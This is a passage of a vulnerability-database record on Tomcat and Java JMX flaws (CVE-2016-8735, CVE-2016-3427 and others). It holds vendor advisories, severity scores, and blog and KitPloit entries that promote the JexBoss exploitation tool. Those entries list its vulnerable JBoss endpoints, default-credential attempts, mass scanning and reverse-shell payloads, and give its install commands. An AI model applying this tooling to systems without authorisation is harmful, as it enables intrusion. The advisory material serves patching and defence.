"cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.72:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m11:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:6.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:32:45", "description": "Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2016-04-21T11:00:00", "type": "cve", "title": "CVE-2016-3427", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-07T02:32:00", "cpe": ["cpe:/a:oracle:jdk:1.6.0", "cpe:/a:oracle:jdk:1.7.0", "cpe:/a:oracle:jre:1.6.0", "cpe:/a:oracle:jrockit:r28.3.9", "cpe:/a:oracle:jdk:1.8.0", "cpe:/a:oracle:jre:1.7.0", "cpe:/a:oracle:jre:1.8.0"], "id": "CVE-2016-3427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3427", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:oracle:jre:1.7.0:update99:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.6.0:update113:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.8.0:update77:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.6.0:update113:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdk:1.7.0:update99:*:*:*:*:*:*", "cpe:2.3:a:oracle:jre:1.8.0:update77:*:*:*:*:*:*", "cpe:2.3:a:oracle:jrockit:r28.3.9:*:*:*:*:*:*:*"]}], "archlinux": [{"lastseen": "2023-12-07T20:47:48", "description": "Arch Linux Security Advisory ASA-201611-22\n==========================================\n\nSeverity: High\nDate : 2016-11-23\nCVE-ID : CVE-2016-6816 CVE-2016-8735\nPackage : tomcat6\nType : multiple issues\nRemote : Yes\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package tomcat6 before version 6.0.48-1 is vulnerable to multiple\nissues including arbitrary code execution and information disclosure.\n\nResolution\n==========\n\nUpgrade to 6.0.48-1.\n\n# pacman -Syu \"tomcat6>=6.0.48-1\"\n\nThe problems have been fixed upstream in version 6.0.48.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2016-6816 (information disclosure)\n\nThe code that parsed the HTTP request line permitted invalid\ncharacters. This could be exploited, in conjunction with a proxy that\nalso permitted the invalid characters but with a different\ninterpretation, to inject data into the HTTP response. By manipulating\nthe HTTP response, the attacker could poison a web-cache, perform an\nXSS attack and/or obtain sensitive information from requests other then\ntheir own.\n\n- CVE-2016-8735 (arbitrary code execution)\n\nThe JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. Therefore, Tomcat installations using\nthis listener remained vulnerable to a similar remote code execution\nvulnerability.\n\nImpact\n======\n\nA remote attacker is able to execute arbitrary code and disclose\nsensitive information.\n\nReferences\n==========\n\nhttps://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48\nhttp://www.openwall.com/lists/oss-security/2016/11/22/17\nhttp://www.openwall.com/lists/oss-security/2016/11/22/16\nhttps://access.redhat.com/security/cve/CVE-2016-6816\nhttps://access.redhat.com/security/cve/CVE-2016-8735", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-23T00:00:00", "type": "archlinux", "title": "[ASA-201611-22] tomcat6: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-23T00:00:00", "id": "ASA-201611-22", "href": "https://security.archlinux.org/ASA-201611-22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "tomcat": [{"lastseen": "2023-12-07T22:42:02", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767656](<https://svn.apache.org/viewvc?view=rev&rev=1767656>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 8.0.0.RC1 to 8.0.38\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767653](<https://svn.apache.org/viewvc?view=rev&rev=1767653>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 8.0.0.RC1 to 8.0.38", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-14T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 8.0.39", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-14T00:00:00", "id": "TOMCAT:604E2DE63F4E10D22151D29C4D2E7487", "href": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T22:42:04", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767684](<https://svn.apache.org/viewvc?view=rev&rev=1767684>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 6.0.0 to 6.0.47\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767683](<https://svn.apache.org/viewvc?view=rev&rev=1767683>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 6.0.0 to 6.0.47", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-15T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 6.0.48", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-15T00:00:00", "id": "TOMCAT:DCB8C0E7C96DD2367CF48625F7A47EDF", "href": "https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T22:42:03", "description": "**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767676](<https://svn.apache.org/viewvc?view=rev&rev=1767676>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 7.0.0 to 7.0.72\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767675](<https://svn.apache.org/viewvc?view=rev&rev=1767675>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 7.0.0 to 7.0.72", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-14T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 7.0.73", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-11-14T00:00:00", "id": "TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B", "href": "https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T22:42:02", "description": "_Note: The issues below were fixed in Apache Tomcat 8.5.7 but the release vote for the 8.5.7 release candidate did not pass. Therefore, although users must download 8.5.8 to obtain a version that includes fixes for these issues, version 8.5.7 is not included in the list of affected versions._\n\n**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767646](<https://svn.apache.org/viewvc?view=rev&rev=1767646>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6\n\n**Important: Denial of Service** [CVE-2016-6817](<https://vulners.com/cve/CVE-2016-6817>)\n\nThe HTTP/2 header parser entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.\n\nThis was fixed in revision [1765798](<https://svn.apache.org/viewvc?view=rev&rev=1765798>).\n\nThis issue was reported as [60232](<https://bz.apache.org/bugzilla/show_bug.cgi?id=60232>) on 10 October 2016 and the security implications identified by the Apache Tomcat Security Team on the same day. It was made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767645](<https://svn.apache.org/viewvc?view=rev&rev=1767645>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 8.5.0 to 8.5.6", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 8.5.8", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2016-11-08T00:00:00", "id": "TOMCAT:0DBA25EA40A6FEBF5FD9039D7F60718E", "href": "https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-07T22:42:01", "description": "_Note: The issues below were fixed in Apache Tomcat 9.0.0.M12 but the release vote for the 9.0.0.M12 release candidate did not pass. Therefore, although users must download 9.0.0.M13 to obtain a version that includes fixes for these issues, version 9.0.0.M12 is not included in the list of affected versions._\n\n**Important: Remote Code Execution** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)\n\nThe *JmxRemoteLifecycleListener* was not updated to take account of Oracle's fix for [CVE-2016-3427](<https://vulners.com/cve/CVE-2016-3427>). Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used.\n\nThis was fixed in revision [1767644](<https://svn.apache.org/viewvc?view=rev&rev=1767644>).\n\nThis issue was reported to the Apache Tomcat Security Team on 19 October 2016 and made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11\n\n**Important: Denial of Service** [CVE-2016-6817](<https://vulners.com/cve/CVE-2016-6817>)\n\nThe HTTP/2 header parser entered an infinite loop if a header was received that was larger than the available buffer. This made a denial of service attack possible.\n\nThis was fixed in revision [1765794](<https://svn.apache.org/viewvc?view=rev&rev=1765794>).\n\nThis issue was reported as [60232](<https://bz.apache.org/bugzilla/show_bug.cgi?id=60232>) on 10 October 2016 and the security implications identified by the Apache Tomcat Security Team on the same day. It was made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11\n\n**Important: Information Disclosure** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)\n\nThe code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.\n\nThis was fixed in revision [1767641](<https://svn.apache.org/viewvc?view=rev&rev=1767641>).\n\nThis issue was reported to the Apache Tomcat Security Team on 11 October 2016 and made public on 22 November 2016.\n\nAffects: 9.0.0.M1 to 9.0.0.M11", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-11-08T00:00:00", "type": "tomcat", "title": "Fixed in Apache Tomcat 9.0.0.M13", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-6817", "CVE-2016-8735"], "modified": "2016-11-08T00:00:00", "id": "TOMCAT:9E43DA1677EA0537439D1A6D19A16EC5", "href": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2023-12-07T21:30:33", "description": "The code that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own (CVE-2016-6816). The JmxRemoteLifecycleListener was not updated to take account of Oracle's fix for CVE-2016-3427. Therefore, Tomcat installations using this listener remained vulnerable to a similar remote code execution vulnerability. This issue has been rated as important rather than critical due to the small number of installations using this listener and that it would be highly unusual for the JMX ports to be accessible to an attacker even when the listener is used (CVE-2016-8735). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-12T01:44:05", "type": "mageia", "title": "Updated tomcat package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427", "CVE-2016-6816", "CVE-2016-8735"], "modified": "2016-12-12T01:44:05", "id": "MGASA-2016-0417", "href": "https://advisories.mageia.org/MGASA-2016-0417.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2017-08-11T08:07:48", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on Java EXploitation like a Boss wording.\n\n![JexBoss](http://pentestit.com/wp-content/uploads/2017/08/JexBoss.png)\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts and objects state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, ie. taking the serialized data to rebuild it into the original object. This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. Another good news is that it JexBoss is Python 2 & Python 3 compatible. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification & EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2017-08-11T06:52:45", "type": "pentestit", "title": "JexBoss: Java Deserialization Verification & EXploitation Tool!", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-08-11T06:52:45", "id": "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "href": "http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2023-12-07T20:55:11", "description": "JexBoss is a tool for testing and exploiting [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. \n \n**Requirements** \n\n\n * Python >= 2.7.x\n * [urllib3](<https://pypi.python.org/pypi/urllib3>)\n * [ipaddress](<https://pypi.python.org/pypi/ipaddress>)\n \n**Installation on Linux\\Mac** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host 